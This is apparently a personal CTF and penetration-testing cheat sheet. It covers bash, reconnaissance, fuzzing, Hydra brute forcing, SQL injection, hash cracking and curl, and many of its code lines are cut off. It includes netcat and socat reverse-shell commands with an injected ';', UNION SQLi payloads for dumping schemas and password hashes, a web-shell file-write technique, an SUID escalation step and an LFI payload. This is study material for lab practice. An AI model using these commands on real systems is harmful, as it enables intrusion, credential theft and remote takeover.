

CTF

Daniel Hiller

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Introduction

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Contributing

Found an error or have a suggestion? Please open an issue on GitHub (github.com/dentremor/Software-Defined-Infrastrucure):



Figure 1: QR code to source repository

License

License



Figure 2: AGPL-3.0 license badge

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VM

QEMU

QEMU

To create a disk image run the following command:

```
qemu-img create -f qcow2 disk.qcow2 64G
```

The VM can be executed with a bash script (remove Image.iso with the distro image of your choice):

```
#!/bin/bash
```

```
qemu-system-x86_64 -enable-kvm -m 4096 -smp $(nproc) -cpu h
```

If you also have a 4k-panel, you probably will face some scaling issues like me. In that case make sure you use Wayland instead of X11.

Linux

Basic Commands

Basic Commands

Command	Description
whoami	Displays current username.
wc	print newline, word, and byte counts for each file.
which	Locate a command.
id	Returns users identity.
hostname	Sets or prints the name of current host system.
uname	Prints basic information about the operating system name and system hardware.
pwd	Returns working directory name.
ifconfig	The ifconfig utility is used to assign or to view an address to a network interface and/or configure network interface parameters.
ip	IP is a utility to show or

FIND

FIND

find search for files in a directory hierarchy:

```
$ find / -type f -name *.conf -user root -size +20k -newermt 2020-03-03 -exec ls -al {} \; -2>/dev/null
```

<code>*(-type f</code>	= defined the type of the searched
<code>-name *.conf</code>	= indicates the name of the object
<code>-user root</code>	= filters all files from a specific
<code>-size +20k</code>	= show only files which are larger
<code>-newermt 2020-03-03</code>	= show only files newer than the sp
<code>-exec ls -al {} \;</code>	= this option executes the specifie
<code>-2>/dev/null</code>	= this redirection ensures that no

Filter Content

Filter Content

`less` is file pager.

`sort` sort lines of text files.

`tr` translate or delete characters.

`column` columnate lists - to display results in tabular form use the flag `-t`.

`wc` print newline, word, and byte counts for each file - `-l` prints line counter

Grep

grep print lines matching a pattern. If we want to exclude a result we must use the `-v` flag.

Cut

cut remove sections from each line of files.

```
$ cat /etc/passwd | grep -v "false\|nologin" | cut -d":" -f1
```

<code>*(-d ":"</code>	= Sets a delimiter at the character `:``
<code>-f1</code>	= Selects only this field in our case the first

Locate

Locate

locate - find files by name

Update the database for locate:

```
$ sudo updatedb
```

Search for all files that end with .conf

```
$ locate *.conf
```

File Descriptors

File Descriptors

1. Data Stream for Input

▶ STDIN - 0

2. Data Stream for Output

▶ STDOUT - 1

3. Data Stream for Output that relates to an error occurring.

▶ STDERR - 2

If we want to discard for example all errors and redirect the data into a file we can use:

```
$ find /etc/ -name shadow 2> stderr.txt 1> stdout.txt
```

Bash Scripting

Bash Scripting

If we want to execute a bash script we can do this by the following command:

```
$ <interpreter> script.sh <optional arguments>
```

Run a bash script with persistent permissions (-p):

```
$ ./bashscript -p
```

In the first line we can specify the interpreter but if we call the script with another one, the defined in the shebang will be ignored:

```
#!/bin/bash
```

This is also possible with other scripting languages like Python

```
#!/usr/bin/env python. ### Conditional Execution
```

The rough basic structure is as follows:

```
if [[ -z "$string" ]]; then
    echo "String is empty"
elif [[ -n "$string" ]]; then
```

Operators

String comparison operators "< / >" **works only** within the double square brackets `[[<condition>]]`.

Command	Description
<code>[[-z STRING]]</code>	Empty string
<code>[[-n STRING]]</code>	Not empty string
<code>[[STRING == STRING]]</code>	Equal
<code>[[STRING != STRING]]</code>	Not Equal
<code>[[NUM -eq NUM]]</code>	Equal
<code>[[NUM -ne NUM]]</code>	Not equal
<code>[[NUM -lt NUM]]</code>	Less than
<code>[[NUM -le NUM]]</code>	Less than or equal
<code>[[NUM -gt NUM]]</code>	Greater than
<code>[[NUM -ge NUM]]</code>	Greater than or equal
<code>[[-o noclobber]]</code>	If OPTIONNAME is enabled
<code>[[! EXPR]]</code>	Not
<code>[[X && Y]]</code>	And
<code>[[X Y]]</code>	Or

File Operators

Command	Description
<code>[[-e FILE]]</code>	Exists
<code>[[-r FILE]]</code>	Readable
<code>[[-h FILE]]</code>	Symlink
<code>[[-d FILE]]</code>	Directory
<code>[[-w FILE]]</code>	Writable
<code>[[-s FILE]]</code>	Size is > 0 bytes
<code>[[-f FILE]]</code>	File
<code>[[-x FILE]]</code>	Executable
<code>[[FILE1 -nt FILE2]]</code>	1 is more recent than 2
<code>[[FILE1 -ot FILE2]]</code>	2 is more recent than 1
<code>[[FILE1 -ef FILE2]]</code>	Same files

Arguments

Arguments

It is possible to pass up to 9 arguments (\$0-\$9) to a script:

```
$ ./script.sh ARG1 ARG2 ARG3 ... ARG9
```

```
ASSIGNMENTS:      $0      $1      $2      $3 ...      $9
```

Special Variables

Special Variables

Command	Description
<code>\$#</code>	This variable holds the number of arguments passed to the script.
<code>\$@</code>	This variable can be used to retrieve the list of command-line arguments.
<code>\$n</code>	Each command-line argument can be selectively retrieved using its position. For example, the first argument is found at <code>\$1</code> .
<code>\$\$</code>	The process ID of the currently executing process.
<code>\$?</code>	The exit status of the script. This variable is useful to determine a command's success. The value <code>0</code> represents

Variables

Variables

It is important that when assigning a variable there is **no space** around the equal sign:

```
variable="test"
```

Arrays

Arrays

The values in the array are separated by spaces. If we want to escape these spaces, we can use single quotes (' ... ') or double quotes (" ... ").

```
#!/bin/bash
```

```
domains=(www.inlanefreight.com ftp.inlanefreight.com vpn.in
```

```
echo ${domains[0]}
```

Arithmetic

Arithmetic

Operator	Description
+	Addition
-	Subtraction
*	Division
%	Modulus
variable++	Increase the value of the variable by 1
variable--	Decrease the value of the variable by 1

We can also calculate the length of the variable. Using this function `${#variable}`, every character gets counted, and we get the total number of characters in the variable.

Input Control

Input Control

Read input from the user, while the script is running:

```
read -p "Select your option: " opt
```

- *(-p = Ensures that our input remains on the same line
- opt = The input will be stored in the variable opt)

Output Control

Output Control

In some cases the scripts take longer time and the user don't have any feedback. To solve this problem we can use tee, which enables us to write something to a file and also returning it as standard output:

```
netrange=$(whois $ip | grep "NetRange\|CIDR" | tee -a CIDR  
*(-a    = Append to the given FILES, do not overwrite)
```

Loops

For Loops

The idea behind for loops is that we iterate over something, or we have a limit how often the loop should run.

Syntax - Examples

```
for $variable in 1 2 3 4
do
    echo $variable
done
```

```
for $variable in file1 file2 file3
do
    echo $variable
done
```

```
for ip in "10.10.10.170 10.10.10.174 10.10.10.175"
do
```

While Loops

The while loop will be executed as long the condition is fulfilled. There are two keywords available which gives us more control over the while loop.

- ▶ `break` → Interrupts the loop
- ▶ `continue` → Immediately continues with the next loop run

Syntax - Examples

```
#!/bin/bash
```

```
counter=0
```

```
while [ $counter -lt 10 ]  
do  
    # Increase $counter by 1  
    ((counter++))  
    echo "Counter: $counter"
```

```
    if [ $counter == 2 ]
```

Until Loops

Nevertheless, the until loop works precisely like the while loop, but with the difference:

- ▶ The code inside an until loop is executed as long as the particular condition is false

Switch case

Switch case

The keyword for a switch-case-statement starts with the keyword `case`, followed by the variable or value as an expression, which is then compared in the pattern. If the variable or value matches the expression, then the statements are executed after the parenthesis and ended with a double semicolon (`;;`).

Syntax - Examples

```
read -p "Select your option: " opt
```

```
case $opt in
    "1") network_range ;;
    "2") ping_host ;;
    "3") network_range && ping_host ;;
    "*") exit 0 ;;
esac
```

Functions

Functions

The definition of a function is at the beginning of a bash script this ensures that it is already defined before it is called.

Syntax - Examples

Method 1 - Functions

```
function name {  
    <commands>  
}
```

Method 2 - Functions

```
name() {  
    <commands>  
}
```

The function is called only by calling the specified name of the function.

Parameter Passing

In principle, the same applies to the passed parameters as to parameters passed to a shell script. These are \$1 - \$9 ({n}), or \$variable as we have already seen. Each function has its own set of parameters. So they do not collide with those of other functions or the parameters of the shell script

Syntax - Examples

```
#!/bin/bash
```

```
function print_pars {  
    echo $1 $2 $3  
}
```

```
one="First parameter"  
two="Second parameter"  
three="Third parameter"
```

```
print_pars "$one" "$two" "$three"
```

Return Values

Like our bash script, the functions return status codes:

Return Code	Description
1	General errors
2	Misuse of shell builtins
126	Command invoked cannot execute
127	Command not found
128	Invalid argument to exit
128+n	Fatal error signal "n"
130	Script terminated by Control-C
255*	Exit status out of range

To get the value of a function back, we can use several methods like `return`, `echo`, or a variable.

Syntax - Examples

```
#!/bin/bash
```

Debugging

Debugging

Bash allows us to debug our code by using the “-x” (xtrace) and “-v” (verbose) options.

Cheat Sheet

Cheat Sheet

For more information about bash scripting have a look in the following cheat sheet: [devhints](#)

Information Gathering

Passive Information Gathering

Passive Information Gathering

`whois` can be used for querying domain names, IP addresses, or autonomous systems.

DIG

dig is a DNS lookup utility.

WaybackMachine is an American digital library that provides free public access to digitalized materials, including websites, collected automatically via its web crawlers.

```
$ dig any google.com @8.8.8.8
```

```
*(any          = query all types of records
```

```
  @8.8.8.8     = define a dns server from which you want to
```

Project Sonar

To find all available subdomains we can use Project Sonar:

```
$ export TARGET="facebook.com"
```

```
$ curl -s https://sonar.omnisint.io/subdomains/$TARGET | jq
```

Certificates

To gain more information we can search for certificates at sites like crt.sh and search.censys.io.

Active Information Gathering

Active Information Gathering

Wappalyzer is a browser extension which finds out what technologies are used on a website.

WAFW00F is a Web Application Firewall Fingerprinting Tool.

Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.

WhatWeb

WhatWeb is a Web scanner - identify technologies used by websites.

```
$ whatweb -a 1 https://www.facebook.com -v
```

```
*(-a      = Set the aggression level. 1(low) - 4(high)  
  -v      = verbose)
```


Active Subdomain Enumeration (Zone transfer)

1. Identifying Nameservers: `shell nslookup -type=NS <target>`
2. Testing for ANY and AXFR Zone Transfer: `shell nslookup -type=any -query=AXFR <target> <nameserver>`

Gobuster - DNS

First we need to create our pattern file, which is described in Project Sonar section. Now we can export the parameters and run the gobuster command.

```
$ export TARGET="facebook.com"
$ export NS="d.ns.facebook.com"
$ export WORDLIST="numbers.txt"
$ gobuster dns -q -r "${NS}" -d "${TARGET}" -w "${WORDLIST}"

*(-q    = Don't print the banner and other noise
  -r    = Use custom DNS server
  -d    = A target domain name
  -p    = Path to the patterns file
  -w    = Path to the wordlist
  -o    = Output file)
```

ffuf

`ffuf` is a fast web fuzzer written in Go that allows typical directory discovery, virtual host discovery (without DNS records) and GET and POST parameter fuzzing.

Performance

Performance

To increase the speed of ffuf we can increase the number of threads with the `-t` flag, but it is important that we don't give ffuf too much power because it could lead in a DoS.

```
$ ffuf -w <SNIP> -u <SNIP> -t 200
```

Directory Fuzzing

Directory Fuzzing

With the `-w` flag we can pass our wordlist, with `-u` the URL we want to fuzz. To tell `ffuf` where we want to fuzz, we need to place the `FUZZ` keyword this can look like the following command:

```
$ ffuf -w SecLists/Discovery/Web-Content/directory-list-2.3
```


Page Fuzzing

Page Fuzzing

If we want, we can combine two keywords in one search. For that we can use FUZZ_1.FUZZ_2. ##### Extension Fuzzing

```
$ ffuf -w SecLists/Discovery/Web-Content/web-extensions.txt
```

Page Fuzzing

```
$ ffuf -w SecLists/Discovery/Web-Content/directory-list-2.3
```

Recursive Fuzzing

Recursive Fuzzing

```
$ ffuf -w SecLists/Discovery/Web-Content/directory-list-2.3
```

```
*(-recursion          = scans the directory recursive  
  -recursion-depth 1  = only fuzz the current directory  
  -e .php             = specify the extension  
  -v                  = output the full URLs)
```

Subdomain Fuzzing

Subdomain Fuzzing

```
$ ffuf -w SecLists/Discovery/DNS/subdomains-top1million-500
```

Vhost Fuzzing

Vhost Fuzzing

```
$ ffuf -w SecLists/Discovery/DNS/subdomains-top1million-5000 \
* (-H 'Host: FUZZ.example.com' = Header `Name: Value`, sep=, \
-fs xxx = filter all incorrect results)
```

Parameter Fuzzing

GET Request

```
$ ffuf -w SecLists/Discovery/Web-Content/burp-parameter-name.txt -u http://10.10.10.10:8080/ -s 200  
*(-fs xxx      = filter all incorrect results)
```

POST Request

```
$ ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-p
```

```
*(-X = HTTP method to use  
-d = POST data  
-H 'Host: FUZZ.example.com' = Header `"Name: Value"`, sep  
-fs xxx = filter all incorrect results
```

Value Fuzzing

```
$ ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin
```

```
*(-X          = HTTP method to use  
  -d          = POST data  
  -H 'Host: FUZZ.example.com' = Header `"Name: Value"`, separated by ;  
  -fs xxx     = filter all incorrect results
```

Exploiting Network Services

GitHub Repos

GitHub Repos

[

SecLists] (<https://github.com/danielmiessler/SecLists>)

[PayloadsAllTheThings](#)

SSH

SSH

Authenticate via ssh with the key-file id_rsa:

```
$ ssh -i id_rsa user@10.10.10.10
```

```
*(-i [file] = Identity file)
```

NMAP

NMAP

Checks open ports in defined range and check running services with Nmap:

```
$ nmap 10.10.221.8 -sV -p- -v
```

*(-p- = Scans the whole portrange

-v = verbose

-p = Specific port or portrange

-sV = Attempts to determine the version of the service

-A = Enables OS detection, version detection, script scan

FTP

FTP

Download a File from an FTP-Server with Wget:

```
$ wget -m ftp://user:password@ftp.example.com
```

```
*(-m = --mirror)
```

Hydra

Use Hydra for cracking password in our example on an FTP-Service:

```
$ hydra -t 4 -l dale -P /usr/share/wordlists/rockyou.txt -vV
```

```
*(-t 4      = Number of parallel connections per target
-l [user]   = Points to the user who's account you're trying
-P [file]   = Points to the file containing the list of pos
-vV         = Very verbose: shows the login+pass combinatio
[IP]        = The IP address of the target machine
[ftp]       = Sets the protocol)
```

On PHP

```
hydra -l admin -P /usr/shared/rockyou.txt <ip> http-post-f
```

```
hydra http-post-form -U # For help
```

NFS

NFS

List name or NFS shares:

```
$ /usr/sbin/showmount -e [IP]
```

*(-e = Shows the NFS server's export list
[IP] = The IP Address of the NFS server)

Connect NFS share with mount point on our machine:

```
$ sudo mount -t nfs IP:share /tmp/mount/ -nolock
```

*(-t nfs = Type of device to mount, then specifying that
IP:share = The IP Address of the NFS server, and the name
-nolock = Specifies not to use NLM locking)

SMTP

SMTP

There are three relevant commands, when it comes to SMTP:

(VRFY = Confirming the names of valid users

EXPN = Reveals the actual address of user's aliases and

RCPT TO = Specifies the e-mail address of the recipient)

Metasploit

Metasploit

<code>*(search [name]</code>	<code>= Search for a module and l</code>
<code>use [name]</code>	<code>= Selects a module by name</code>
<code>options</code>	<code>= When a module is selected</code>
<code>set [option] [parameter]</code>	<code>= Set a specific option wit</code>
<code>run</code>	<code>= Run the exploit)</code>

For further information see the following documentation:

[offensive-security.com](https://www.offensive-security.com)

SQL injection

Types

1. In-band 1.1 Union Based 1.1 Error Based
2. Blind 2.1 Boolean Based 2.2 Time Based
3. Out-of-band

SQLi Discovery

Payload	URL Encoded
'	%27
"	%22
#	%23
;	%3B
)	%29

If we add one of the above payloads and observe any weird behavior from the webpage, we can assume that there is a SQL injection possible.

For example, we can now try an OR Injection.

```
admin' or '1'='1
```

When there is no hint for a valid username we can repeat this for the password.

For more Payloads please have a look in the [PayloadsAllTheThings](#)

Comments

Comment	Description
--	Inline - Must contain a whitespace after the two dashes!
#	Inline - Note correct URL encoding
/**/	Inline - Unusual

Union Clause

If we use the union clause it is important that we ensure that the data type on the selected columns are the same.

It can appear that we query two columns from a table and want to union it with another single column. In that case, we have to add another column and fill it with junk. For example NULL, because it fits all data types.

```
SELECT * from products where product_id = '1' UNION SELECT
```

Union Injection

To check the amount of columns we can use the ORDER BY or UNION function. If we exceed the number of columns we generate an error and therefore know the maximum number.

```
anything' UNION select 1,2,3--
```

Dont forget the whitespace after the double dash!

As a part of our UNION injection we can try to determine more information about the database.

Information	Payload
Comments	SELECT @@version
Current User	SELECT user();, SELECT system_user();
List Users	SELECT user FROM mysql.user; - priv
List Password Hashes	SELECT host, user, password FROM mysql.user; - priv

Enumeration

To get data with a UNION SELECT we need to create proper SELECT queries. Therefore it is essential for us to know the schema conditions. This can be realized by enumeration.

In our first step, we want to know what databases are present on the system. A matching injection could look like the following:

```
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA
```

Now that we have an overview of the databases, let's see which one we are in.

```
cn' UNION select 1,database(),2,3--
```

An overview over the different tables could look like the following:

```
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA
```

The last information that we need are the name of the columns.

```
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA
```

Now that we have all the information we can start querying data

Reading Files

There are two ways (UNION SELECT or SELECT) to check which rights our user has.

```
SELECT USER()
```

```
SELECT CURRENT_USER()
```

```
SELECT user from mysql.user
```

```
cn' UNION SELECT 1, user(), 3, 4--
```

```
cn' UNION SELECT 1, user, 3, 4 from mysql.user--
```

User Privileges

Now that we know our user, we need to know which privileges he has.

```
SELECT super_priv FROM mysql.user
```

```
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user--
```

When we have several users we can only show the privileges of the searched user.

```
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE
```

To check other privileges then the root user privilege we can use

Writing Files

Requirements: 1. User with FILE privilege enabled 2. MySQL global `secure_file_priv` variable not enabled 3. Write access to the location we want to write to on the back-end server

`secure_file_priv`

```
SHOW VARIABLES LIKE 'secure_file_priv';  
SELECT variable_name, variable_value FROM information_schem  
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM :
```

SELECT INTO OUTFILE

Write output from a SELECT query into a file.

```
SELECT * from users INTO OUTFILE '/tmp/credentials';
```

Write any string into a file.

```
SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';
```

Writing Files through SQL Injection

If we want to write a web shell we need to know the base web directory. One way to find it out is the `load_file` function which shows us Apache's configuration, this can be found at

Mitigating SQL Injection

If possible restrict valid characters, give the database user the least required permissions, use a WAF and parameterized queries.

PHP

Use the `mysqli_real_escape_string()` or the `pg_escape_string()` function.

MySQL

MySQL

To ensure that we are working with a MySQL Server we can use the following commands.

Payload	When to Use	Expected Output	Wrong Output
SELECT @@version	When we have full query output	MySQL Version 'i.e. 10.3.22-MariaDB'	In MSSQL it returns 'i.e. MSSQL-Linux Ubuntu1' version. Error with other DBMS.
SELECT POW(1,1)	When we only have numeric output	1	Error with other DBMS
SELECT SLEEP(5)	Blind/No Output	Delays page response for 5 seconds and returns 0.	Will not delay response with other DBMS

Cracking Credentials

If we do not have any credentials we can use Nmap or Metasploit to gain this information:

```
$ nmap --script=mysql-enum [target]
```

```
*(--script=mysql-enum      = Scan with a single script  
  [target]                 = The IP address of the target)
```

Now that we know some usernames of the database, we can try to crack the passwords of them with Hydra:

```
hydra -t 16 -l root -P /usr/share/wordlists/rockyou.txt -vV [IP]
```

```
*(-t 16      = Number of parallel connections per target  
  -l [user]  = Points to the user who's account you're trying  
  -P [file]  = Points to the file containing the list of passwords  
  -vV       = Very verbose: shows the login+pass combinations  
  [IP]      = The IP address of the target machine  
  [mysql]   = Sets the protocol)
```

Cheat Sheets

- ▶ pentestmonkey.net ### John the Ripper If we have a hash which look something like the following example:

```
carl:*EA031893AA21444B170FC2162A56978B8CEECE18
```

We can pipe the hash in a file:

```
$ echo carl:*EA031893AA21444B170FC2162A56978B8CEECE18 > hash.txt
```

And crack the password with John the Ripper:

```
$ john hash.txt
```

```
$ john --show --format=RAW-MD5 hash.txt
```

```
*(--show                = show cracked passwords  
  --format=<param>      = force hash type: descrypt, bsdicrypt, ...)
```

Hashcat

Hashcat

```
$ hashcat --force -m 500 -a 0 -o found1.txt --remove puthas
```

Web Fundamentals

HTTP

HTTP

There are several headers we can face:

Header Type	Message Type	Description
General Headers	request & response	Describes the message rather than the content
Entity Headers	request & response	Describes the content
Request Headers	request	HTTP requests are messages sent by the client to initiate an action on the server
Response Headers	response	HTTP responses are messages sent by a server in response to a request message
Security Headers	response	These define certain

GET Request

We can gain information about the version of the web server and the operating system with the curl flag `-I` which returns us the http header:

```
$ curl -I "http://${TARGET}"
```

`*(-I = return HTTP header)`

If we face HTTP authentication we can pass our credentials with one of the following two commands:

```
$ curl -u admin:admin http://${TARGET}
```

```
$ curl http://admin:admin@<SERVER_IP>:<PORT>/
```

`*(-u = pass credentials to the server)`

X-Powered-By header can tell us what the web app is using. We can see values like PHP, ASP.NET, JSP, etc.

Cookies are another value to look at as each technology by default has its cookies. Some default cookies are:

POST Request

It mostly appears that we have to log in with a POST request. In this case we can use command from below.

```
$ curl -L -X POST -d 'username=admin&password=admin' http://<URL>

*(-L = If the server reports that the requested page has moved,
  -X = the method set with -X, --request overrides the method
  -d = HTTP POST data
  -i = Include protocol response headers in the output
  -v = verbose)
```

With a successful authentication, we should gain a cookie from the Set-Cookie header. For all subsequent requests we can use this cookie to authenticate us.

```
$ curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<URL>

*(-b <data|filename> = Pass the data to the HTTP server in the cookie
```

In some cases it can appear that we have to use a JSON format

```
$ curl -X POST -d '{"search":"london"}' -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<URL>
```

PUT Request

The PUT request looks very similar to the POST request and can be used to modify information on a source.

```
$ curl -X PUT http://<SERVER_IP>:<PORT>/api.php/city/london
```

```
*(-X = the method set with -X, --request overrides the method)
  -d = HTTP POST data
  -H = pass a header)
```

DELETE Request

To delete information we can use the DELETE request.

```
$ curl -X DELETE http://<SERVER_IP>:<PORT>/api.php/city/New
```

*(-X = the method set with -X, --request overrides the method)

Curl

Curl

If we want to get sources of a webpage, we can do this with Curl:

```
$ curl -X GET http://10.10.4.59:8081/ctf/post.html
```

```
*(-X [GET]           = Set kind of fetch method
   [target]          = The URL of the webpage we want to fetch
   -d [param]         = Sends the specified data in a POST request)
```

We can also save files with the -O flag:

```
$ curl -O inlanefreight.com/index.html -o home.html -s -v
```

```
*(-O      = Save the output into a file
   -o      = Specify the filename
   -s      = Silent the status
   -v      = verbose)
```

To retrieve an even more verbose output use the -vvv flag. The certificate check can be skipped with the -k flag, when establish a https connection via curl.

GEWL password list generator

Web Applications

Web Applications

OWASP Web Security Testing Guide

Exploit databases:

- ▶ (Exploit DB)[<https://www.exploit-db.com/>]
- ▶ (Rapid7 DB)[<https://www.rapid7.com/db/>]
- ▶ (Vulnerability Lab)[<https://www.vulnerability-lab.com/>] ###
Reverse Shell

Netcat

Listener:

```
$ nc -lvp 4242
```

Victim:

```
$ ;nc -e /bin/sh 10.0.0.1 4242
```

Socat

Listener:

```
$ socat -d -d TCP4-LISTEN:4443 STDOUT
```

Victim (Linux):

```
$ ;socat TCP4:10.0.0.1:4443 EXEC:/bin/bash
```

Victim (Windows):

```
$ ;socat TCP4:192.168.168.1:4443 EXEC:'cmd.exe',pipes
```

Stabilize Shell

You can stabilize the shell with the python module pty:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

For more information checkout the following GitHub repo:

[PayloadsAllTheThings](#)

If you gain access depending on the OS you can try the following commands to get more information: >Linux

```
$ whoami
```

```
$ id
```

```
$ ifconfig/ip addr
```

```
$ uname -a # print system information
```

```
$ ps -ef # -e = select all processes
```

```
$ less /etc/passwd # usernames with UID, GID, GR
```

```
$ cut -d: -f1 /etc/passwd # only usernames
```

```
$ cat /etc/os-release # Get information about the O
```

Windows

```
$ whoami
```

Privilege Escalation

Exploiting SUID

```
find / -perm /4000 2>/dev/null
```

```
sudo chmod +s bash
```

SQL injection (SQLi)

MySQL Basics

MySQL Basics

To interact with MySQL/MariaDB we can use the `mysql` binary.

```
$ mysql -u root -h docker.hackthebox.eu -P 3306 -p
```

```
Enter password:
```

```
...SNIP...
```

```
mysql>
```

```
*(-u      = User
  -h      = Host
  -P      = Port
  -p      = Password)
```


Operators

- ▶ Division (/), Multiplication (*), and Modulus (%)
- ▶ Addition (+) and subtraction (-)
- ▶ Comparison (=, >, <, <=, >=, !=, LIKE)
- ▶ NOT (!)
- ▶ AND (&&)
- ▶ OR (||)

For an overview please have a look at the (MySQL cheatsheet)[<https://devhints.io/mysql>]. ## LFI

entry=php://filter/convert.base64-encode/resource=index.php